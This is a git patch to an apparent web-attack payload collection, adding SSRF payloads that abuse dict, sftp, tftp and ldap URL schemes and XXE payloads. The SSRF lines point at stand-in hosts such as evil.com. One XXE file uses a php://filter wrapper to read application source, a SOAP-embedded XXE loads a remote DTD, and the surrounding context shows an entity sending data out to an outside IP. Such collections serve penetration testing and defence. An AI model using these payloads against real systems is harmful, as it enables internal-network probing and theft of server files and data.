From 9adb81e6d8b820fef8635e39df8827a9dabf6533 Mon Sep 17 00:00:00 2001
From: Swissky <maxropelewski@gmail.com>
Date: Mon, 7 Aug 2017 21:42:14 +0200
Subject: [PATCH] SSRF URL Scheme + XXE Soap

---
 SSRF injection/README.md                 | 26 ++++++++++++++++++++++++
 XXE injections/Files/XXE PHP Wrapper.xml | 10 +++++++++
 XXE injections/README.md                 |  7 +++++++
 3 files changed, 43 insertions(+)
 create mode 100644 XXE injections/Files/XXE PHP Wrapper.xml

diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index fd99c41..2af9a6c 100644
--- a/SSRF injection/README.md	
+++ b/SSRF injection/README.md	
@@ -71,7 +71,33 @@ requests + browsers : 2.2.2.2
 urllib : 3.3.3.3
 ```
 
+## SSRF via URL Scheme
+Dict://   
+The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
+```
+dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
+ssrf.php?url=dict://attacker:11111/
+```
+
+Sftp://
+```
+ssrf.php?url=sftp://evil.com:11111/
+```
+
+Tftp://
+```
+ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
+```
+
+Ldap://
+```
+ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
+```
+
+
 ## Thanks to
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
 * [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
 * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
+* [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
+* [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
diff --git a/XXE injections/Files/XXE PHP Wrapper.xml b/XXE injections/Files/XXE PHP Wrapper.xml
new file mode 100644
index 0000000..9581749
--- /dev/null
+++ b/XXE injections/Files/XXE PHP Wrapper.xml	
@@ -0,0 +1,10 @@
+<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
+<contacts>
+  <contact>
+    <name>Jean &xxe; Dupont</name>
+    <phone>00 11 22 33 44</phone>
+    <adress>42 rue du CTF</adress>
+    <zipcode>75000</zipcode>
+    <city>Paris</city>
+  </contact>
+</contacts>
diff --git a/XXE injections/README.md b/XXE injections/README.md
index 9ff5a47..4213c78 100644
--- a/XXE injections/README.md	
+++ b/XXE injections/README.md	
@@ -96,6 +96,13 @@ File stored on http://92.222.81.2/dtd.xml
 <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
 ```
 
+XXE Inside SOAP
+```
+<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
+```
+
+
 ## Thanks to
 * https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
 * http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
+* https://gist.github.com/staaldraad/01415b990939494879b4